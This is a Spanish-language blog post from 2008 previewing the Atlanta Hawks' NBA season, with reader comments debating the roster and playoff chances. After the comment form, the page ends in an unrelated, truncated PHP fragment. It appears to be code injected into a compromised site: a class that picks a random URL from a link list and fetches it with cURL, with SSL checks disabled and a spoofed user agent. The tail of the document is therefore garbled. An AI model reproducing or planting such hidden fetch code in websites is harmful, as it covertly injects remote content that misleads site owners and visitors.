Atlanta Hawks: Vuelo hacia un horizonte incierto

25 de September de 2008 por TheDeerHunter

joejoshNo ha pasado mucho tiempo desde que los jóvenes halcones terminaron su temporada sorprendiendo a propios y extraños con el susto de campeonato (y nunca mejor dicho) que les regalaron, junto con alguna que otra caricia adicional, a la franquicia del trébol en primera ronda de los pasados Playoffs.

Nadie había dado un duro por ellos, ni para ganar un solo partido, y ahí habían estado, luchando como jabatos hasta el límite mismo de sus capacidades, dejando esa imagen tremenda contra un rival de tan alta categoría. Un núcleo duro de jugadores, mezcla de talento y potencia física, rezumando casta por cada uno de sus poros.

Ninguno de sus aficionados podía sentir otra cosa que optimismo tras la mediocridad vivida tantas temporadas seguidas. Pocos recordaban en ese punto que habían llegado ahí ganando únicamente 37 partidos en la última plaza de una de las más patéticas temporadas en la conferencia Este que se recuerdan. Lo dicho: con puntuales retoques y el desarrollo de sus jóvenes e inexpertos valores todo parecía indicar que se podía dejar atrás la larga etapa de “coleccionistas de promesas y fracasos”.

joejohnsonbobcatsPero poco les iba a durar la ilusión intacta a los sufridos seguidores del halcón. Si ya era dura la competencia en la NBA, ahora aparece un nuevo rival. El €uro golpea las puertas de la todopoderosa liga y Josh Childress se marchó a Moscú. Lo que debía de ser un verano para reforzar la buena base que había, se trasformó en penurias por retener lo que se pueda.

Casi a regañadientes se logró renovar a Josh Smith y las restricciones del mercado impidieron firmar refuerzos importantes que, incluso, sean capaces de hacer olvidar a Childress. Nombres como Maurice Evans, Ronald Murray o Randolph Morris no parecen el salto cualitativo que este equipo necesita, máxime si sus rivales en el Este se refuerzan como lo han hecho.

El objetivo de los Hawks este año sería mejorar las 37 victorias del año pasado y consolidarse como equipo de Playoffs. Potencial tienen. Josh Smith es el elegido para comandar el proyecto, no sabemos si muy a pesar suyo. Implicado es una mala bestia y está bien arropado por la alhorfordkgbuena cantidad de puntos garantizados por Joe Johnson. En la posición de pívot se espera otro buen año para Al Horford, temporada de sophomore en la que algunos se atascan. Si Mike Bibby recupera parte de su exquisita dirección all-star a la que nos tenía acostumbrados y Marvin Williams logra encontrar su rol estamos ante un quinteto de altos vuelos.

La segunda unidad no es gran cosa. Acie Law y Speedy Claxton cubren bien la posición de base. Maurice Evans y Flip Murray son tipos serios y cumplidores. En cuanto a Zaza Pachulia, no sabemos bien si va o si viene. Poco más hay, de momento.

Con todo, tampoco parece realista pensar en quedar mucho más alto de la 8ª plaza que lograron entonces y eso, con la diferencia que sufren con respecto a los gallos de la conferencia, supone, en el mejor de los casos, la cuasi-garantizada derrota en primera ronda. Al final, por cómo pinta el asunto ahora mismo, vemos improbable que lo logren.

Quinteto inicial: Bibby, Joe Johnson, Josh Smith, Marvin Williams y Al Horford.
6º Hombre: Maurice Evans.
Pronóstico: Fuera de Playoffs por poco.

Comenta

6 comentarios a esta entrada

  1. Txusma dice:
    #1

    Creo q Deer da en el clavo: la q deberia ser la temporada q aupara a los Hawks a puestos mas importantes en el Este creo q se convertira en una penuria y es que la dificil renovacion de Josh Smith es casi peor noticia q la huida de Childress. Tener a un jugador descontento en el equipo es lo peor q te puede pasar y no me sorprenderia q los promedios del alero cayeran de manera “misteriosa”. Y si la teorica estrella pasa, no hay nada que hacer.

      Citar

  2. MagicJohnson32 dice:
    #2

    Veo un equipo demasiado justito, el banquillo sin Childress es un solar. Pero no descarto que entren en Playoffs, porque creo que volverá a estar bastante barata la octava plaza del Este y el cuarteto JJ-Josh-Bibby-Horford es bueno. A Johnson le ha venido de maravilla la llegada de Bibby y la cosa, conforme pase el tiempo y con el training camp de por medio, habría de ir a mejor.

      Citar

  3. planetbasket.net dice:
    #3
  4. Jabho dice:
    #4

    Si, Atlanta mejorará posiblemente los 37 partidos ganados y estará en la lucha por lo PO pero poco más. Salvo que cambien de rumbo. YO optaría por buscar un buen trade con Josh…

    En lo positivo ver aque nivel llegan Horford y Marvin. Ahí podría estar la clave de la mejora del equipo

      Citar

  5. Kantonyo dice:
    #5

    Buen articulo de TheDeerHunter, estoy totalmente de acuerdo en casi todo.

    Sin grandes cambios en la plantilla, y con la decepción de la marcha de Childress, solo cabe esperar la progresión de tanto talento joven. Si Al Hortford, Marvin Williams, Josh Smith y Joe Johnson progresan, serán un equipazo y no tendrán techo, si no fuera así todo pinta a una temporada de trasición en los Hawks.

      Citar

  6. portu dice:
    #6

    Hablando del análisis general estoy bastante de acuerdo con Deer, pero en el rol otrogado a varios jugadores discrepo en algunos puntos: el peso del equipo, el liderazgo considero q correspondió el año pasado y corresponderá éste a Joe Johnson y no tanto a Josh Smith, aunque Smith tiene minutos de gran impacto en el juego tanto en ataque como en defensa; en cuanto a Bibby, pues considero q su rol principal no es de distribuidor de juego y nunca se ha carcaterizado por ser un base director, sino más bien por suponer una amenaza exterior y permitir liberar de algunos tiros forzados a Joe; en cuanto a Claxton y Law, pues no los considero alternativas, uno pq demostró muy poco en su año rookie, mientras el otro parece q tiene lesiones crónicas y serias, parece q la posición de base suplente quedará huérfana con algunos minutos para Joe;

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>